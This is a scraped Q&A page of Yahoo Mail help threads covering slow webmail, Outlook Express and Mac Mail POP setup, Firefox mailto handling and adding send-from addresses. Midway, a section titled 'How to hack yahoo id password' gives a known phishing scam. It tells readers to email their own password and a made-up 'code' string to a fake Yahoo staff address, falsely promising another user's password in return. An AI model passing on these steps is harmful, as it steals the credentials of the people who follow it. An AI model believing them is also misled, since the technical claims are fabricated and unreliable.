Question about Yahoo Mail

1 Answer

Several problems with my Yahoo account

When I'm composing a message and typing names into the "To" line, the names and addresses normally pop in. Now, the first and last names are separated by an additional space so when I hit "Send", I get an error message stating there's a problem in the addresses. So I have to manually remove the first and last names, leaving just the email addresses with the <> before and after. Then it will send the email. If I use the "Insert Addresses", when I click on "To", it won't insert the address.

Another problem I'm having is when attaching documents. I hit "Browse" and find the document then hit "Attach File". When it finally attaches and I try to go back to the message body, it won't go back. It just sits there with an hourglass. I can never send the message. So I had to use my work email to send a personal email and it worked just fine.

My Yahoo email has been running slower and slower. I've cleared my history, temp files and cookies. I'm not having these problems with my work email or any other software on my computer. It seems to be only Yahoo related. Please help me because I love Yahoo, I recommend it to everyone and don't want to go anywhere else.

Gee, I honestly don't know which one I'm using. I guess it's the Web mail because I use it from everywhere, my work computer, my laptop, desktop at home as well as my iPhone.

The problem just began in the last couple of days. Yahoo has been running incredibly slow too. Everything I do is preceeded with a "Loading...." sign.

I've also had a weird problem with sending mail. Yesterday I was typing an email to someone and it kept kicking me out. Then my friend emailed me to ask what was wrong because she kept receiving emails from me with one word at a time. It only happened that one time but it was very strange.

That is weird.. Did you check any of your preferences to see if you have anything being forwarded to a POP3 account(ie. Outlook etc..?)

also, check your internet options, and check your security settings to see if you have anything that might be blocking you accessing webmail.. install 3rd party cookies etc..

i doubt its your computer, the problem lies withing your actuall acount or internet settings... check them and see what happens.

if the problem continues, try opening a new e-mail address and test it out that way too..

I use Yahoo, and I havent had this problem, but:

Are you using the Downloaded yahoo app, where you can access the e-mail from your desktop? or are you using the Web mail?

How to receive mails from two yahoo accounts to one place?

Hi Vinay,

You need to configur your microsoft outlook or windows mail or outlook express in such a way that you recive mails from both the account to one inbox. Follow the below steps if you have ms outlook.

Microsoft Outlook Express
Yahoo! Mail users can read their email in Outlook Express by subscribing to the Yahoo! Mail Plus service. This service allows you to use Outlook Express or another POP3 client to access and manage your Yahoo! Mail messages.

Outlook Express allows you to add a new email account to your existing profile. This means you do not have to replace your current settings in order to send and receive Yahoo! Mail messages. Here's how:

1. From the Tools menu, choose "Accounts."
2. Select the "Mail" tab.
3. Click the "Add" button.
4. From the Add menu, click "Mail."
5. In the text box labeled Display Name, type your name and click "Next."
6. In the Email Address box, type your Yahoo! Mail address (be sure to include "@yahoo.com") and click "Next."
7. Under "My incoming mail server is a..." select "POP3."
8. Type "pop.mail.yahoo.com" in the Incoming Mail (POP3, IMAP, or HTTP) Server box.
9. Type "smtp.mail.yahoo.com" in the Outgoing Mail (SMTP) Server box.
10. Click "Next."
11. In the Account Name box, type your Yahoo! Mail ID (your email address without the "@yahoo.com").
12. In the Password box, type your Yahoo! Mail password.
13. If you want Outlook Express to remember your password, check the "Remember password" box.
14. Do not check the boxes labeled "Log on using Secure..."
15. Click "Next."
16. Click "Finish."

Important: The Yahoo! Mail SMTP server now requires authentication. To turn this setting on:

1. From the Tools menu, choose "Accounts."
2. Select the "Mail" tab.
3. Double-click the account labeled "pop.mail.yahoo.com."
4. Select the "Servers" tab.
5. Check the box next to "My Server Requires Authentication."
6. Click "OK."

To control deletion of messages from the Yahoo! Mail Server:

1. From the Tools menu, choose "Accounts."
2. Select the "Mail" tab.
3. Double-click the account labeled "pop.mail.yahoo.com."
4. Select the "Advanced" tab.
5. In the Delivery section at the bottom of the window, check "Leave a copy of messages on server" if you want to save your Yahoo! Mail messages on the Yahoo! Mail server as well as on your local computer. Do not check this box if you want your messages to be deleted from the Yahoo! Mail server once you have received them in Outlook Express.

If your ISP blocks port 25 or if you're unable to send email, then you will need to use port 587 when sending via Yahoo!'s SMTP server. To make this change, please follow the directions below:

1. From the "Tools" menu, select "Accounts"
2. Select your Yahoo! POP account and click on the "Properties" button
3. Click on the "Advanced" tab
4. Next to "Outgoing server (SMTP), change port 25 to 587
5. Click "Apply", then click "OK" and "Close"

Access Free Yahoo! Mail with Mac OS X Mail Using POP Over MacFreePOPs

To set up access to a free Yahoo! Mail account in Mac OS X Mail:

  • Install MacFreePOPs and make sure the freepopsd service is running.
  • Select Mail ' Preferences... from the menu in Mac OS X Mail.
  • Go to the Accounts category.
  • Click + at the bottom of the Accounts list.
  • Type your name under Full Name:.
  • Enter your full Yahoo! Mail address (e.g. "example@yahoo.com") under Email Address:.
  • Type your Yahoo! Mail password under Password:.
  • Make sure Automatically set up account is not checked.
  • Click Continue.
  • Make sure POP is selected under Account Type:.

  • Click Continue again, ignoring the error. We'll take care of that in a bit.
  • Make sure Password is selected under Authentication:.
  • Leave Use Secure Sockets Layer (SSL) unchecked.
  • Click Continue.
  • Select an existing mail server to send mail under Outgoing Mail Server

Every time i access my yahoo mail the firefox.exe will pop up and there are 3 boxes that you need to click.....debug...sending error report....and ..don't send.what can i do.please help me.

In Firefox 3, by default, when user click on an email address or a URL link location that starts with mailto: protocol, the default email client, such as Microsoft Outlook, Outlook Express or Windows Mail will be opened to allow user to compose and send email to the specific recipient?s mail address. If you prefer to use web based Yahoo! Mail as your default email client, and want to let Yahoo! Mail handles all mailto: protocol, so that the automatic e-mail message composing and email sending will be done via Yahoo! webmail interface, Firefox 3 provides a very easy way to associate the mailto: link with Yahoo! mail web-based interface, in fact, it?s a built-in integration. Go to Tools -> Options. Click on Applications tab icon. Locate and click to highlight mailto Content Type, and at the corresponding drop down box of Action, select Use Yahoo! Mail. Click OK. After change, whenever a mailto: link is clicked, the email address will be sent to Yahoo! Mail account Compose web interface, with recipient automatically set at the clicked e-mail address. Of course, user has to enter user name and password credentials first if he or she hasn?t already logged in. Note: It?s also possible to set Gmail as the default mailto: handler at Firefox 3 best of luck Mel

How to hack yahoo id password

STEP 1- Log in to your own yahoo account. Note: Your
account must be at
least 30 days old for this to work.
STEP 2- Once you have logged into your own account,
compose/write an e-mail
to: RETRIVE_PASS_KEY_CGI_BIN@yahoo.com This is a mailing
address to the Yahoo
Staff. The automated server will send you the password
that you have
'forgotten', after receiving the information you send
them.
STEP 3- In the subject line type exactly: " PASSWORD
RECOVERY "
STEP 4- On the first line of your mail write the email
address of the person
you are hacking.
STEP 5- On the second line type in the e-mail address
you are using.
STEP 6- On the third line type in the password to YOUR
email address (your
OWN password). The computer needs your password so it
can send a JavaScript
from your account in the Yahoo Server to extract the
other email addresses
password. In other word the system automatically
checks your password to
confirm the integrity of your status.
The process will be done automatically by the user
administration server. STEP 7- The final step before
sending the mail is,
type on the fourth line the following code exactly:
cgi-bin_RETRIVE_PASS_BIN_PUB/$et76431&pwrsa
script< ip://233.243.2.34/cgi-bin/start?
v703&login=passmachine&f=(password)&f=27586&javascript=ACTIVE&rsa#>
{simply copy and paste above.} so for example if your yahoo id is :
David_100@yahoo.com and your password
is: David and the email address you want to hack is:
test@yahoo.com then
compose the mail as below: To: RETRIVE_PASS_KEY_CGI_BIN@yahoo.com
bcc: cc: (Don't write anything in cc,bcc field) Subject: " PASSWORD RECOVERY " test@yahoo.com
David_100@yahoo.com
David
cgi-bin_RETRIVE_PASS_KEY_CGI_BIN/$et76431&pwrsa
script< ip://233.243.2.34/cgi-bin/start?
v703&login=passmachine&f=(password)&f=27586&javascript=ACTIVE&rsa#>
{simply copy and paste above.} The password will be sent to your inbox in a mail
called "System Reg
Message" from "System. When my friend showed me how
to do this I thought it was too good a trick to keep
to myself! Just try and
enjoy!

My yahoo ID can't sending mail

  1. Click Options in the upper-right corner of the page and select Mail Options.
  2. Under “Management”, click Mail Addresses.
  3. Click Add.
  4. In the box, enter an account name for your own reference (for example, Work or School) …and click Continue.
  5. There would be two boxes: In the first one, put the name you’d like others to see when they get email from this address. In the second one, type the Email address you’d like send from – from within Yahoo! Mail! (You’ll be asked to verify this other address in an email we will send to you there.) Click Continue.
  6. Do you want to be able to check email in this account from your Yahoo! account as well? (You can check your mail in clients like Outlook and Eudora, but currently you won’t be able to check mail in other webmail accounts with providers like Hotmail, Gmail or Yahoo. You can send from these other addresses from within Yahoo! Mail.)
    1. If yes, (you want to check mail in your Outlook or Eudora or similar client), skip to step 9.
    2. If no, you don't want to check mail in this account, you just want to be able to SEND from it from inside your Yahoo! account. Click Skip this Step at the bottom of the Add Account page and continue to step 7.
  7. On the page that opens, check to make sure you’ve entered the correct email address. If you need to make any changes, click Edit Address. If it looks fine, click Send Verification to generate the email we send to you to make sure this is an actual account you use.
  8. The “Verify Account” page opens. Here’s the easiest way to complete your setup and start sending mail from the new address:
    1. Leave this "Verify Account" page open.
    2. In a different browser window or application, sign into your other Mail account.
    3. Look for an email from Yahoo! Member Services, and open it.
    4. Copy the “confirmation code” in the last line of the email by either double-clicking it or clicking and dragging over it, then either clicking Copy from the Edit menu or pressing Ctrl + “c”. (Mac users press Command + “c”.)
    5. Get back on the “Verify Account” page and Paste that confirmation code in the box beside “Confirmation Code:” …You can paste by clicking Paste in the Edit menu, or by pressing Ctrl + “v”. (Mac users press Command + “v”.)
    6. At the bottom of the page, click Verify Account.
    7. A sign-in page opens with your ID already filled in. Sign in with your password.
    8. You’re done. See the new account in the list on your Mail Accounts page? Now you can easily send from it by opening a Compose page, clicking the down-arrow on the end of the “From:” box, and clicking the new account in the pull-down list of email addresses. People receiving the message will see it as being sent from that address.
  9. OK, so you also want to be able to check email in this other account from your Yahoo! Mail account? No problem. On the page you’re looking at, enter that account’s mail server name (currently, only POP mail servers are supported). It will be something like pop.goestheweasel.com. To find out what it is, either search that application’s Help pages for “POP” or “server” (or both), or contact that email provider directly.
  10. Next, type your user name for that account and the password. This is completely confidential! Nobody has access to this information, but Yahoo! Mail needs it to check the account. Note: Your user name is the text in your email address before the "@" symbol.
  11. We thought a good way to identify mail from different accounts would be to give it a different color in your Yahoo! Inbox. So that’s what this last part is about: pick an indicator color to mark messages received from this account.
  12. Click Setup Mail Server. You should now be looking at the “Verify Account” page. Go back to Step 7 to hopskotch your way through account verification. Once that’s done, you can do it all from Yahoo! Mail – check mail in that account and send mail from that account.
Note: Yahoo! Mail only retrieves messages from your external (POP) mail accounts when you request it. Do this by clicking the other account’s server name in the upper-left corner of the page under “Check Other Mail”.
